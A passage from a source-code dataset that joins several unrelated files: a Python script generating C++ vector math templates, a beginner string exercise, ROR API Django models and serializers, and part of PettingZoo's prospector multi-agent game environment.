for op, func, comment in binary_ops:
print binary_op_str.format(op=op, func=func, comment = comment if comment is not None else func)
# }
# }
if __name__ == '__main__': main()
```
#### File: single_header_math/scripts/vecfns.py
```python
unary_fns = [
('sin', 'sin'),
('cos', 'cosine'),
('tan', 'tangent'),
('sec', 'secant'),
('csc', 'cosecant'),
('cot', 'cotangent'),
('asin', 'inverse sin'),
('acos', 'inverse cosine'),
('atan', 'inverse tangent'),
('asec', 'inverse secant'),
('acsc', 'inverse cosecant'),
('acot', 'inverse cotangent'),
('sinh', 'hyperbolic sin'),
('cosh', 'hyperbolic cosine'),
('tanh', 'hyperbolic tangent'),
('sech', 'hyperbolic secant'),
('csch', 'hyperbolic cosecant'),
('coth', 'hyperbolic cotangent'),
('asinh', 'inverse hyperbolic sin'),
('acosh', 'inverse hyperbolic cosine'),
('atanh', 'inverse hyperbolic tangent'),
('asech', 'inverse hyperbolic secant'),
('acsch', 'inverse hyperbolic cosecant'),
('acoth', 'inverse hyperbolic cotangent'),
('radians', 'degrees to radians'),
('degrees', 'radians to degrees'),
('exp', 'exp'),
('exp2', 'exp base 2'),
('expm1', 'exp(x) - 1'),
('log', 'log'),
('log2', 'log2'),
('log10', 'log10'),
('log1p', 'log(1 + x)'),
('sqrt', 'sqrt'),
('cbrt', 'cbrt'),
('abs', 'abs'),
('floor', 'floor'),
('ceil', 'ceil'),
('isnan', 'isnan'),
('isinf', 'isinf'),
('sign', 'sign'),
('fract', 'fract'),
# TODO etc
]
binary_fns = [
('atan', 'inverse tangent (2-arg)', 'y', 'x'),
('pow', 'pow', 'x', 'a'),
('mod', 'mod', 'x', 'm'),
('step', 'step', 'edge', 'x'),
# TODO etc
]
ternary_fns = [
('mix', 'mix', 'x1', 'x2', 't'),
('clamp', 'clamp', 'x', 'lower', 'upper'),
('smoothstep', 'smoothstep', 'edge0', 'edge1', 'x'),
# TODO etc
]
unary_fn_str = '''// vec {comment}
template <typename VecT, enable_if_vector_t<VecT> = 0>
inline auto {func}(const VecT &v) {{
using cgra::detail::scalars::{func};
return zip_with([](const auto &x) {{ return {func}(x); }}, v);
}}
'''
binary_fn_str = '''// vec {comment}
template <typename VecT1, typename VecT2, enable_if_vector_compatible_t<VecT1, VecT2> = 0>
inline auto {func}(const VecT1 &v{arg1}, const VecT2 &v{arg2}) {{
using cgra::detail::scalars::{func};
return zip_with([](const auto &x{arg1}, const auto &x{arg2}) {{ return {func}(x{arg1}, x{arg2}); }}, v{arg1}, v{arg2});
}}
// vec {comment} right scalar
template <typename VecT, typename T, enable_if_vector_scalar_compatible_t<VecT, T> = 0>
inline auto {func}(const VecT &v{arg1}, const T &{arg2}) {{
using cgra::detail::scalars::{func};
return zip_with([&](const auto &x{arg1}) {{ return {func}(x{arg1}, {arg2}); }}, v{arg1});
}}
// vec {comment} left scalar
template <typename VecT, typename T, enable_if_vector_scalar_compatible_t<VecT, T> = 0>
inline auto {func}(const T &{arg1}, const VecT &v{arg2}) {{
using cgra::detail::scalars::{func};
return zip_with([&](const auto &x{arg2}) {{ return {func}({arg1}, x{arg2}); }}, v{arg2});
}}
'''
ternary_fn_str = '''// vec {comment}
template <typename VecT1, typename VecT2, typename VecT3, enable_if_vector_compatible_t<VecT1, VecT2, VecT3> = 0>
inline auto {func}(const VecT1 &v{arg1}, const VecT2 &v{arg2}, const VecT3 &v{arg3}) {{
using cgra::detail::scalars::{func};
return zip_with([](const auto &x{arg1}, const auto &x{arg2}, const auto &x{arg3}) {{ return {func}(x{arg1}, x{arg2}, x{arg3}); }}, v{arg1}, v{arg2}, v{arg3});
}}
// vec {comment} ({arg3})-scalar
template <typename VecT1, typename VecT2, typename T3, enable_if_vector_compatible_t<VecT1, VecT2> = 0, enable_if_vector_scalar_compatible_t<VecT1, T3> = 0>
inline auto {func}(const VecT1 &v{arg1}, const VecT2 &v{arg2}, const T3 &{arg3}) {{
using cgra::detail::scalars::{func};
return zip_with([&](const auto &x{arg1}, const auto &x{arg2}) {{ return {func}(x{arg1}, x{arg2}, {arg3}); }}, v{arg1}, v{arg2});
}}
// vec {comment} ({arg2})-scalar
template <typename VecT1, typename T2, typename VecT3, enable_if_vector_compatible_t<VecT1, VecT3> = 0, enable_if_vector_scalar_compatible_t<VecT1, T2> = 0>
inline auto {func}(const VecT1 &v{arg1}, const T2 &{arg2}, const VecT3 &v{arg3}) {{
using cgra::detail::scalars::{func};
return zip_with([&](const auto &x{arg1}, const auto &x{arg3}) {{ return {func}(x{arg1}, {arg2}, x{arg3}); }}, v{arg1}, v{arg3});
}}
// vec {comment} ({arg2},{arg3})-scalar
template <typename VecT1, typename T2, typename T3, enable_if_vector_scalar_compatible_t<VecT1, T2> = 0, enable_if_vector_scalar_compatible_t<VecT1, T3> = 0>
inline auto {func}(const VecT1 &v{arg1}, const T2 &{arg2}, const T3 &{arg3}) {{
using cgra::detail::scalars::{func};
return zip_with([&](const auto &x{arg1}) {{ return {func}(x{arg1}, {arg2}, {arg3}); }}, v{arg1});
}}
// vec {comment} ({arg1})-scalar
template <typename T1, typename VecT2, typename VecT3, enable_if_vector_compatible_t<VecT2, VecT3> = 0, enable_if_vector_scalar_compatible_t<VecT2, T1> = 0>
inline auto {func}(const T1 &{arg1}, const VecT2 &v{arg2}, const VecT3 &v{arg3}) {{
using cgra::detail::scalars::{func};
return zip_with([&](const auto &x{arg2}, const auto &x{arg3}) {{ return {func}({arg1}, x{arg2}, x{arg3}); }}, v{arg2}, v{arg3});
}}
// vec {comment} ({arg1},{arg3})-scalar
template <typename T1, typename VecT2, typename T3, enable_if_vector_scalar_compatible_t<VecT2, T1> = 0, enable_if_vector_scalar_compatible_t<VecT2, T3> = 0>
inline auto {func}(const T1 &{arg1}, const VecT2 &v{arg2}, const T3 &{arg3}) {{
using cgra::detail::scalars::{func};
return zip_with([&](const auto &x{arg2}) {{ return {func}({arg1}, x{arg2}, {arg3}); }}, v{arg2});
}}
// vec {comment} ({arg1},{arg2})-scalar
template <typename T1, typename T2, typename VecT3, enable_if_vector_scalar_compatible_t<VecT3, T1> = 0, enable_if_vector_scalar_compatible_t<VecT3, T2> = 0>
inline auto {func}(const T1 &{arg1}, const T2 &{arg2}, const VecT3 &v{arg3}) {{
using cgra::detail::scalars::{func};
return zip_with([&](const auto &x{arg3}) {{ return {func}({arg1}, {arg2}, x{arg3}); }}, v{arg3});
}}
'''
def main():
for func, comment in unary_fns:
print unary_fn_str.format(func=func, comment=comment)
# }
for func, comment, arg1, arg2 in binary_fns:
print binary_fn_str.format(func=func, comment=comment, arg1=arg1, arg2=arg2)
# }
for func, comment, arg1, arg2, arg3 in ternary_fns:
print ternary_fn_str.format(func=func, comment=comment, arg1=arg1, arg2=arg2, arg3=arg3)
# }
# }
if __name__ == '__main__': main()
``` |
{
"source": "JJSerAnexinet/2021_python_selenium",
"score": 3
} |
#### File: 2021_python_selenium/Module_01/reto2_unique_char.py
```python
def unique_char(pal):
    # index of the first character that occurs exactly once, or -1 if none
    palabra = list(pal)
    for index in range(len(palabra)):
        if palabra.count(palabra[index]) == 1:
            return index
    return -1
palabra = "selenium"
print(unique_char(palabra))
``` |
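An equivalent two-pass alternative, sketched with collections.Counter, avoids the O(n^2) cost of the repeated list.count calls (the helper name is hypothetical):

```python
from collections import Counter

def unique_char_counter(pal):
    counts = Counter(pal)             # one pass to count every character
    for index, ch in enumerate(pal):  # second pass to find the first unique one
        if counts[ch] == 1:
            return index
    return -1

print(unique_char_counter("selenium"))  # 0, because 's' appears only once
```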
{
"source": "jjshoe/ror-api",
"score": 2
} |
#### File: management/commands/upgrade.py
```python
from django.core.management.base import BaseCommand
from .downloadgrid import Command as DownloadGridCommand
from .convertgrid import Command as ConvertGridCommand
class Command(BaseCommand):
help = 'Generate up-to-date ror.zip from GRID data'
def handle(self, *args, **options):
DownloadGridCommand().handle(args, options)
ConvertGridCommand().handle(args, options)
```
#### File: ror-api/rorapi/models.py
```python
import pycountry
from rest_framework import serializers
#####################################################################
# Models #
#####################################################################
class Entity:
"""Generic model class"""
def __init__(self, base_object, attributes):
[setattr(self, a, getattr(base_object, a)) for a in attributes]
class ExternalIds:
"""A model class for storing external identifiers"""
def __init__(self, data):
for a in [
'ISNI', 'FundRef', 'HESA', 'UCAS', 'UKPRN', 'CNRS', 'OrgRef',
'Wikidata', 'GRID'
]:
try:
setattr(self, a, Entity(getattr(data, a),
['preferred', 'all']))
except AttributeError:
pass
class Organization(Entity):
"""Organization model class"""
def __init__(self, data):
super(Organization, self).__init__(data, [
'id', 'name', 'types', 'links', 'aliases', 'acronyms', 'status',
'wikipedia_url'
])
self.labels = [Entity(l, ['label', 'iso639']) for l in data.labels]
self.country = Entity(data.country, ['country_name', 'country_code'])
self.external_ids = ExternalIds(data.external_ids)
class TypeBucket:
"""A model class for type aggregation bucket"""
def __init__(self, data):
self.id = data.key.lower()
self.title = data.key
self.count = data.doc_count
class CountryBucket:
"""A model class for country aggregation bucket"""
def __init__(self, data):
self.id = data.key.lower()
country = pycountry.countries.get(alpha_2=data.key)
try:
self.title = country.official_name
except AttributeError:
self.title = country.name
self.count = data.doc_count
class Aggregations:
"""Aggregations model class"""
def __init__(self, data):
self.types = [TypeBucket(b) for b in data.types.buckets]
self.countries = [CountryBucket(b) for b in data.countries.buckets]
class ListResult:
"""A model class for the list of organizations returned from the search"""
def __init__(self, data):
self.number_of_results = data.hits.total
self.time_taken = data.took
self.items = [Organization(x) for x in data]
self.meta = Aggregations(data.aggregations)
class MatchedOrganization:
"""A model class for an organization matched based on an affiliation
string"""
def __init__(self, data):
self.substring = data.substring
self.score = data.score
self.matching_type = data.matching_type
self.chosen = data.chosen
self.organization = data.organization
class MatchingResult:
"""A model class for the result of affiliation matching"""
def __init__(self, data):
self.number_of_results = len(data)
self.items = [MatchedOrganization(x) for x in data]
class Errors:
"""Errors model class"""
def __init__(self, errors):
self.errors = errors
######################################################################
# Serializers #
######################################################################
class OrganizationLabelSerializer(serializers.Serializer):
label = serializers.CharField()
iso639 = serializers.CharField()
class CountrySerializer(serializers.Serializer):
country_name = serializers.CharField()
country_code = serializers.CharField()
class ExternalIdSerializer(serializers.Serializer):
preferred = serializers.CharField()
all = serializers.StringRelatedField(many=True)
class GridExternalIdSerializer(serializers.Serializer):
preferred = serializers.CharField()
all = serializers.StringRelatedField()
class ExternalIdsSerializer(serializers.Serializer):
ISNI = ExternalIdSerializer(required=False)
FundRef = ExternalIdSerializer(required=False)
HESA = ExternalIdSerializer(required=False)
UCAS = ExternalIdSerializer(required=False)
UKPRN = ExternalIdSerializer(required=False)
CNRS = ExternalIdSerializer(required=False)
OrgRef = ExternalIdSerializer(required=False)
Wikidata = ExternalIdSerializer(required=False)
GRID = GridExternalIdSerializer(required=False)
class OrganizationSerializer(serializers.Serializer):
id = serializers.CharField()
name = serializers.CharField()
types = serializers.StringRelatedField(many=True)
links = serializers.StringRelatedField(many=True)
aliases = serializers.StringRelatedField(many=True)
acronyms = serializers.StringRelatedField(many=True)
status = serializers.CharField()
wikipedia_url = serializers.CharField()
labels = OrganizationLabelSerializer(many=True)
country = CountrySerializer()
external_ids = ExternalIdsSerializer()
class BucketSerializer(serializers.Serializer):
id = serializers.CharField()
title = serializers.CharField()
count = serializers.IntegerField()
class AggregationsSerializer(serializers.Serializer):
types = BucketSerializer(many=True)
countries = BucketSerializer(many=True)
class ListResultSerializer(serializers.Serializer):
number_of_results = serializers.IntegerField()
time_taken = serializers.IntegerField()
items = OrganizationSerializer(many=True)
meta = AggregationsSerializer()
class MatchedOrganizationSerializer(serializers.Serializer):
substring = serializers.CharField()
score = serializers.FloatField()
matching_type = serializers.CharField()
chosen = serializers.BooleanField()
organization = OrganizationSerializer()
class MatchingResultSerializer(serializers.Serializer):
number_of_results = serializers.IntegerField()
items = MatchedOrganizationSerializer(many=True)
class ErrorsSerializer(serializers.Serializer):
errors = serializers.StringRelatedField(many=True)
```
#### File: rorapi/tests/utils.py
```python
class AttrDict(dict):
def __init__(self, nested_dict):
for k, v in nested_dict.items():
if isinstance(v, dict):
self[k] = AttrDict(v)
elif isinstance(v, list):
self[k] = [
AttrDict(e) if isinstance(e, dict) else e for e in v
]
else:
self[k] = v
def __getattr__(self, attr):
if attr not in self:
raise AttributeError(
'\'AttrDict\' object has no attribute \'{}\''.format(attr))
return self[attr]
class IterableAttrDict():
def __init__(self, nested_dict, iter_list):
self.attr_dict = AttrDict(nested_dict)
self.iter_list = [AttrDict(i) for i in iter_list]
def __iter__(self):
return iter(self.iter_list)
def __getitem__(self, key):
return self.iter_list[key]
def __getattr__(self, attr):
return self.attr_dict.__getattr__(attr)
``` |
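A quick sketch of what these test helpers provide: attribute-style access over nested dicts and lists, mirroring the elasticsearch-dsl response objects the models above consume (keys below are assumptions for illustration):

```python
d = AttrDict({"hits": {"total": 2}, "results": [{"id": "x"}]})
assert d.hits.total == 2
assert d.results[0].id == "x"

it = IterableAttrDict({"took": 5}, [{"id": "a"}, {"id": "b"}])
assert it.took == 5
assert [h.id for h in it] == ["a", "b"]
```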
{
"source": "jjshoots/PettingZoo",
"score": 2
} |
#### File: butterfly/prospector/prospector.py
```python
import itertools as it
import math
import os
from enum import IntEnum, auto
import numpy as np
import pygame as pg
import pymunk as pm
from gym import spaces
from gym.utils import EzPickle, seeding
from pymunk import Vec2d
from pettingzoo import AECEnv
from pettingzoo.utils import agent_selector, wrappers
from pettingzoo.utils.conversions import parallel_wrapper_fn
from . import constants as const
from . import utils
from .manual_control import manual_control
class CollisionTypes(IntEnum):
PROSPECTOR = auto()
BOUNDARY = auto()
WATER = auto()
BANK = auto()
GOLD = auto()
BANKER = auto()
class Prospector(pg.sprite.Sprite):
def __init__(self, pos, space, num, *sprite_groups):
super().__init__(sprite_groups)
self.image = utils.load_image(["prospector.png"])
self.id = num
self.rect = self.image.get_rect(center=pos)
self.orig_image = self.image.copy()
# Create the physics body and shape of this object.
moment = pm.moment_for_circle(1, 0, const.AGENT_RADIUS)
self.body = pm.Body(1, moment, body_type=pm.Body.DYNAMIC)
self.body.nugget = None
self.body.sprite_type = "prospector"
self.shape = pm.Circle(self.body, const.AGENT_RADIUS)
self.shape.elasticity = 0.0
self.shape.collision_type = CollisionTypes.PROSPECTOR
self.body.position = utils.flipy(pos)
# Add them to the Pymunk space.
self.space = space
self.space.add(self.body, self.shape)
def reset(self, pos):
self.body.angle = 0
self.body.angular_velocity = 0
self.image = pg.transform.rotozoom(self.orig_image, 0, 1)
self.rect = self.image.get_rect(center=pos)
self.body.position = utils.flipy(pos)
self.body.velocity = Vec2d(0.0, 0.0)
self.body.force = Vec2d(0.0, 0.0)
self.body.nugget = None
@property
def center(self):
return self.rect.center
def update(self, action):
# These actions are performed with the agent's angle in mind
# forward/backward action
y_vel = action[0] * const.PROSPECTOR_SPEED
# left/right action
x_vel = action[1] * const.PROSPECTOR_SPEED
delta_angle = action[2] * const.MAX_SPRITE_ROTATION
self.body.angle += delta_angle
self.body.angular_velocity = 0
move = pm.Vec2d(x_vel, y_vel)
self.body.apply_force_at_local_point(move, point=(0, 0))
def synchronize_center(self):
self.rect.center = utils.flipy(self.body.position)
self.image = pg.transform.rotate(self.orig_image, math.degrees(self.body.angle))
self.rect = self.image.get_rect(center=self.rect.center)
def update_gold(self):
if self.body.nugget is not None:
self.body.nugget.update(self.body.position, self.body.angle, False)
def convert_img(self):
self.image = self.image.convert_alpha()
def __str__(self):
return f"prospector_{self.id}"
def __repr__(self):
return self.__str__()
class Banker(pg.sprite.Sprite):
def __init__(self, pos, space, num, *sprite_groups):
super().__init__(sprite_groups)
self.image = utils.load_image(["bankers", f"{num}.png"])
self.id = num
self.rect = self.image.get_rect(center=pos)
self.orig_image = self.image.copy()
moment = pm.moment_for_circle(1, 0, const.AGENT_RADIUS)
self.body = pm.Body(1, moment, body_type=pm.Body.DYNAMIC)
self.body.nugget = None
self.body.sprite_type = "banker"
self.shape = pm.Circle(self.body, const.AGENT_RADIUS)
self.shape.collision_type = CollisionTypes.BANKER
self.body.position = utils.flipy(pos)
# Add them to the Pymunk space.
self.space = space
self.space.add(self.body, self.shape)
def reset(self, pos):
self.body.angle = 0
self.image = pg.transform.rotozoom(self.orig_image, 0, 1)
self.rect = self.image.get_rect(center=pos)
self.body.position = utils.flipy(pos)
self.body.velocity = Vec2d(0.0, 0.0)
self.body.nugget = None
@property
def center(self):
return self.rect.center
def update(self, action):
# up/down action
y_vel = action[0] * const.BANKER_SPEED
# left/right action
x_vel = action[1] * const.BANKER_SPEED
        # Subtract math.pi / 2 because the sprite starts off rotated by math.pi / 2
angle_radians = math.atan2(y_vel, x_vel) - (math.pi / 2)
# Angle is determined only by current trajectory.
if not all(a == 0 for a in action):
self.body.angle = angle_radians
self.body.angular_velocity = 0
# rotate movement backwards with a magnitude of self.body.angle
# so that sprite moves forward in chosen direction
move = pm.Vec2d(x_vel, y_vel).rotated(-self.body.angle)
self.body.apply_force_at_local_point(move, point=(0, 0))
def synchronize_center(self):
self.rect.center = utils.flipy(self.body.position)
self.image = pg.transform.rotate(self.orig_image, math.degrees(self.body.angle))
self.rect = self.image.get_rect(center=self.rect.center)
def update_gold(self):
if self.body.nugget is not None:
self.body.nugget.update(
self.body.position, self.body.angle + (math.pi / 2), True
)
def convert_img(self):
self.image = self.image.convert_alpha()
def __str__(self):
return f"banker_{self.id}"
def __repr__(self):
return self.__str__()
class Fence(pg.sprite.Sprite):
def __init__(self, w_type, sprite_pos, body_pos, verts, space, *sprite_groups):
super().__init__(sprite_groups)
self.rects = []
if w_type == "top":
self.tile = utils.load_image(["fence_horiz_tile.png"])
size = self.tile.get_rect().size
x = 15
y = 0
while x <= 1230:
rect = pg.Rect(x, y, *size)
self.rects.append(rect)
x += 50
elif w_type in ["right", "left"]:
self.tile = utils.load_image(["fence_vert_tile.png"])
size = self.tile.get_rect().size
x = 6 if w_type == "left" else 1265
y = 0
while y <= const.VERT_FENCE_HEIGHT:
rect = pg.Rect(x, y, *size)
self.rects.append(rect)
y += 33
else:
raise ValueError("Fence image not found! Check the spelling")
self.body = pm.Body(body_type=pm.Body.STATIC)
# Transform pygame vertices to fit Pymunk body
invert_verts = utils.invert_y(verts)
self.shape = pm.Poly(self.body, invert_verts)
self.shape.elasticity = 0.0
self.shape.collision_type = CollisionTypes.BOUNDARY
self.body.position = utils.flipy(body_pos)
space.add(self.body, self.shape)
def full_draw(self, screen):
for rect in self.rects:
screen.blit(self.tile, rect)
def convert_img(self):
self.tile = self.tile.convert_alpha()
class Bank(pg.sprite.Sprite):
def __init__(self, pos, verts, space, *sprite_groups):
super().__init__(sprite_groups)
self.image = utils.load_image(["bank.png"])
self.rect = self.image.get_rect(topleft=pos)
self.body = pm.Body(body_type=pm.Body.STATIC)
invert_verts = utils.invert_y(verts)
self.shape = pm.Poly(self.body, invert_verts)
self.shape.collision_type = CollisionTypes.BANK
self.body.position = utils.flipy(pos)
self.space = space
self.space.add(self.body, self.shape)
def convert_img(self):
self.image = self.image.convert_alpha()
class Gold(pg.sprite.Sprite):
ids = it.count(0)
def __init__(self, pos, body, space, *sprite_groups):
super().__init__(sprite_groups)
self.id = next(self.ids)
self.image = utils.load_image(["gold.png"])
self.orig_image = self.image
self.rect = self.image.get_rect()
self.moment = pm.moment_for_circle(1, 0, const.GOLD_RADIUS)
self.body = pm.Body(1, self.moment, body_type=pm.Body.KINEMATIC)
self.body.position = body.position
self.shape = pm.Circle(self.body, const.GOLD_RADIUS)
self.shape.collision_type = CollisionTypes.GOLD
# only triggers collision callbacks, doesn't create real collisions
self.shape.sensor = True
self.shape.id = self.id
self.space = space
self.space.add(self.body, self.shape)
self.initial_angle = body.angle - Vec2d(0, -1).angle
self.parent_body = body
def update(self, pos, angle, banker: bool):
if banker:
new_angle = angle
else:
new_angle = angle - self.initial_angle
new_pos = pos + Vec2d(const.AGENT_RADIUS + 9, 0).rotated(new_angle)
self.body.position = new_pos
self.body.angular_velocity = 0
self.rect.center = utils.flipy(self.body.position)
self.image = pg.transform.rotozoom(
self.orig_image, math.degrees(self.body.angle), 1
)
self.rect = self.image.get_rect(center=self.rect.center)
def convert_img(self):
self.image = self.image.convert_alpha()
class Water:
def __init__(self, pos, verts, space, rng):
self.num_cols = math.ceil(const.SCREEN_WIDTH / const.TILE_SIZE)
self.num_rows = math.ceil(const.WATER_HEIGHT / const.TILE_SIZE)
self.top_tile = utils.load_image(["river_to_sand_tile.png"])
self.tile = utils.load_image(["river_tile.png"])
self.debris_tile = utils.load_image(["debris", "seaweed_water.png"])
tile_size = self.tile.get_size()
self.rects = []
for row in range(self.num_rows):
new_row = []
for col in range(self.num_cols):
rect = pg.Rect(
col * const.TILE_SIZE, pos[1] + (row * const.TILE_SIZE), *tile_size
)
new_row.append(rect)
self.rects.append(new_row)
self.body = pm.Body(body_type=pm.Body.STATIC)
# Transform pygame vertices to fit Pymunk body
invert_verts = utils.invert_y(verts)
self.shape = pm.Poly(self.body, invert_verts)
self.shape.collision_type = CollisionTypes.WATER
self.body.position = utils.flipy(pos)
self.space = space
self.space.add(self.body, self.shape)
def generate_debris(self, rng):
self.debris = []
for col in range(1, self.num_cols - 1, 3):
if rng.random_sample() >= 0.5:
y = rng.integers(0, 2)
x = col + rng.integers(0, 3)
rect = self.rects[y][x].copy()
rect.x += 3
rect.y += 9
self.debris.append([self.debris_tile, rect])
def full_draw(self, screen):
for rect in self.rects[0]:
screen.blit(self.top_tile, rect)
for rect in self.rects[1]:
screen.blit(self.tile, rect)
for pair in self.debris:
screen.blit(pair[0], pair[1])
def draw(self, screen):
        self.full_draw(screen)
def convert_img(self):
self.top_tile = self.top_tile.convert_alpha()
self.tile = self.tile.convert_alpha()
self.debris_tile = self.debris_tile.convert_alpha()
class Background:
def __init__(self, rng):
self.num_cols = math.ceil(const.SCREEN_WIDTH / const.TILE_SIZE)
self.num_rows = (
math.ceil((const.SCREEN_HEIGHT - const.WATER_HEIGHT) / const.TILE_SIZE) + 1
)
self.tile = utils.load_image(["sand_tile.png"])
self.debris_tiles = {
0: utils.load_image(["debris", "0.png"]),
1: utils.load_image(["debris", "1.png"]),
2: utils.load_image(["debris", "2.png"]),
3: utils.load_image(["debris", "3.png"]),
}
# Used when updating environment and drawing
self.dirty_rects = []
self.rects = []
# same as (const.TILE_SIZE, const.TILE_SIZE)
tile_size = self.tile.get_size()
for row in range(self.num_rows):
new_row = []
for col in range(self.num_cols):
rect = pg.Rect(col * const.TILE_SIZE, row * const.TILE_SIZE, *tile_size)
new_row.append(rect)
self.rects.append(new_row)
def generate_debris(self, rng):
self.debris = {}
for row in range(1, self.num_rows - 1, 3):
for col in range(1, self.num_cols - 1, 3):
y = row + rng.integers(0, 3)
if y == self.num_rows - 2:
y += -1
x = col + rng.integers(0, 3)
choice = rng.integers(0, 4)
self.debris[self.rects[y][x].topleft] = self.debris_tiles[choice]
def full_draw(self, screen):
for row in self.rects:
for rect in row:
screen.blit(self.tile, rect)
debris = self.debris.get(rect.topleft, None)
if debris is not None:
screen.blit(debris, rect)
def draw(self, screen):
# self.full_draw(screen)
for rect in self.dirty_rects:
screen.blit(self.tile, rect)
debris = self.debris.get(rect.topleft, None)
if debris is not None:
screen.blit(debris, rect)
self.dirty_rects.clear()
def update(self, sprite_rect: pg.Rect):
top_y = int(sprite_rect.top // const.TILE_SIZE)
bottom_y = int(sprite_rect.bottom // const.TILE_SIZE)
left_x = int(sprite_rect.left // const.TILE_SIZE)
right_x = int(sprite_rect.right // const.TILE_SIZE)
self.dirty_rects.append(self.rects[top_y][left_x])
self.dirty_rects.append(self.rects[top_y][right_x])
self.dirty_rects.append(self.rects[bottom_y][left_x])
self.dirty_rects.append(self.rects[bottom_y][right_x])
def convert_img(self):
self.tile = self.tile.convert_alpha()
        for i in self.debris_tiles:
            # convert_alpha() returns a new Surface, so the result must be stored
            self.debris_tiles[i] = self.debris_tiles[i].convert_alpha()
def env(**kwargs):
env = raw_env(**kwargs)
env = wrappers.ClipOutOfBoundsWrapper(env)
env = wrappers.OrderEnforcingWrapper(env)
return env
parallel_env = parallel_wrapper_fn(env)
class raw_env(AECEnv, EzPickle):
def __init__(
self,
ind_reward=0.8,
group_reward=0.1,
other_group_reward=0.1,
prospec_find_gold_reward=1,
prospec_handoff_gold_reward=1,
banker_receive_gold_reward=1,
banker_deposit_gold_reward=1,
max_cycles=450,
):
EzPickle.__init__(
self,
ind_reward,
group_reward,
other_group_reward,
prospec_find_gold_reward,
prospec_handoff_gold_reward,
banker_receive_gold_reward,
banker_deposit_gold_reward,
max_cycles,
)
total_reward_factor = ind_reward + group_reward + other_group_reward
if not math.isclose(total_reward_factor, 1.0, rel_tol=1e-09):
raise ValueError(
"The sum of the individual reward, group reward, and other "
"group reward should add up to approximately 1.0"
)
self.agents = []
self.sprite_list = [
"bankers/0.png",
"bankers/1.png",
"bankers/2.png",
"prospector.png",
]
self.max_cycles = max_cycles
pg.init()
self.seed()
self.closed = False
self.background = Background(self.rng)
self.space = pm.Space()
self.space.gravity = Vec2d(0.0, 0.0)
self.space.iterations = 20 # for decreasing bounciness
self.space.damping = 0.0
self.all_sprites = pg.sprite.RenderUpdates()
self.gold = []
self.water = Water(
const.WATER_INFO[0], const.WATER_INFO[1], self.space, self.rng
)
# Generate random positions for each prospector agent
prospector_info = [
(i, utils.rand_pos("prospector", self.rng))
for i in range(const.NUM_PROSPECTORS)
]
self.prospectors = {}
for num, pos in prospector_info:
prospector = Prospector(pos, self.space, num, self.all_sprites)
identifier = f"prospector_{num}"
self.prospectors[identifier] = prospector
self.agents.append(identifier)
banker_info = [
(i, utils.rand_pos("banker", self.rng)) for i in range(const.NUM_BANKERS)
]
self.bankers = {}
for num, pos in banker_info:
banker = Banker(pos, self.space, num, self.all_sprites)
identifier = f"banker_{num}"
self.bankers[identifier] = banker
self.agents.append(identifier)
self.banks = []
for pos, verts in const.BANK_INFO:
self.banks.append(Bank(pos, verts, self.space, self.all_sprites))
self.fences = []
for w_type, s_pos, b_pos, verts in const.FENCE_INFO:
f = Fence(w_type, s_pos, b_pos, verts, self.space)
self.fences.append(f)
self.metadata = {
"render_modes": ["human", "rgb_array"],
"name": "prospector_v4",
"is_parallelizable": True,
"render_fps": const.FPS,
}
self.action_spaces = {}
for p in self.prospectors:
self.action_spaces[p] = spaces.Box(
low=np.float32(-1.0), high=np.float32(1.0), shape=(3,)
)
for b in self.bankers:
self.action_spaces[b] = spaces.Box(
low=np.float32(-1.0), high=np.float32(1.0), shape=(2,)
)
self.observation_spaces = {}
self.last_observation = {}
for p in self.prospectors:
self.last_observation[p] = None
self.observation_spaces[p] = spaces.Box(
low=0, high=255, shape=const.PROSPEC_OBSERV_SHAPE, dtype=np.uint8
)
for b in self.bankers:
self.last_observation[b] = None
self.observation_spaces[b] = spaces.Box(
low=0, high=255, shape=const.BANKER_OBSERV_SHAPE, dtype=np.uint8
)
self.state_space = spaces.Box(
low=0,
high=255,
shape=((const.SCREEN_HEIGHT, const.SCREEN_WIDTH, 3)),
dtype=np.uint8,
)
self.possible_agents = self.agents[:]
self._agent_selector = agent_selector(self.agents)
self.agent_selection = self._agent_selector.next()
self.reset()
# Collision Handler Functions --------------------------------------------
# Water to Prospector
def add_gold(arbiter, space, data):
prospec_shape = arbiter.shapes[0]
prospec_body = prospec_shape.body
for k, v in self.prospectors.items():
if v.body is prospec_body:
self.rewards[k] += ind_reward * prospec_find_gold_reward
else:
self.rewards[k] += group_reward * prospec_find_gold_reward
for k in self.bankers:
self.rewards[k] += other_group_reward * prospec_find_gold_reward
if prospec_body.nugget is None:
position = arbiter.contact_point_set.points[0].point_a
gold = Gold(position, prospec_body, self.space, self.all_sprites)
self.gold.append(gold)
prospec_body.nugget = gold
return True
# Prospector to banker
def handoff_gold_handler(arbiter, space, data):
banker_shape, gold_shape = arbiter.shapes
gold_sprite = None
for g in self.gold:
if g.id == gold_shape.id:
gold_sprite = g
# gold_sprite is None if gold was handed off to the bank right before
# calling this collision handler
# This collision handler is only for prospector -> banker gold handoffs
if (
gold_sprite is None
or gold_sprite.parent_body.sprite_type != "prospector"
):
return True
banker_body = banker_shape.body
prospec_body = gold_sprite.parent_body
normal = arbiter.contact_point_set.normal
# Correct the angle because banker's head is rotated pi/2
corrected = utils.normalize_angle(banker_body.angle + (math.pi / 2))
normalized_normal = utils.normalize_angle(normal.angle)
if (
corrected - const.BANKER_HANDOFF_TOLERANCE
<= normalized_normal
<= corrected + const.BANKER_HANDOFF_TOLERANCE
):
# transfer gold
gold_sprite.parent_body.nugget = None
gold_sprite.parent_body = banker_body
banker_body.nugget = gold_sprite
for k, v in self.prospectors.items():
self.rewards[k] += other_group_reward * banker_receive_gold_reward
if v.body is prospec_body:
self.rewards[k] += ind_reward * prospec_handoff_gold_reward
else:
self.rewards[k] += group_reward * prospec_handoff_gold_reward
for k, v in self.bankers.items():
self.rewards[k] += other_group_reward * prospec_handoff_gold_reward
if v.body is banker_body:
self.rewards[k] += ind_reward * banker_receive_gold_reward
else:
self.rewards[k] += group_reward * banker_receive_gold_reward
return True
# Banker to bank
def gold_score_handler(arbiter, space, data):
gold_shape, _ = arbiter.shapes
for g in self.gold:
if g.id == gold_shape.id:
gold_class = g
if gold_class.parent_body.sprite_type == "banker":
self.space.remove(gold_shape, gold_shape.body)
gold_class.parent_body.nugget = None
banker_body = gold_class.parent_body
for k, v in self.bankers.items():
if v.body is banker_body:
self.rewards[k] += ind_reward * banker_deposit_gold_reward
else:
self.rewards[k] += group_reward * banker_deposit_gold_reward
for k in self.prospectors:
self.rewards[k] += other_group_reward * banker_deposit_gold_reward
self.gold.remove(gold_class)
self.all_sprites.remove(gold_class)
return False
# Create the collision event generators
gold_dispenser = self.space.add_collision_handler(
CollisionTypes.PROSPECTOR, CollisionTypes.WATER
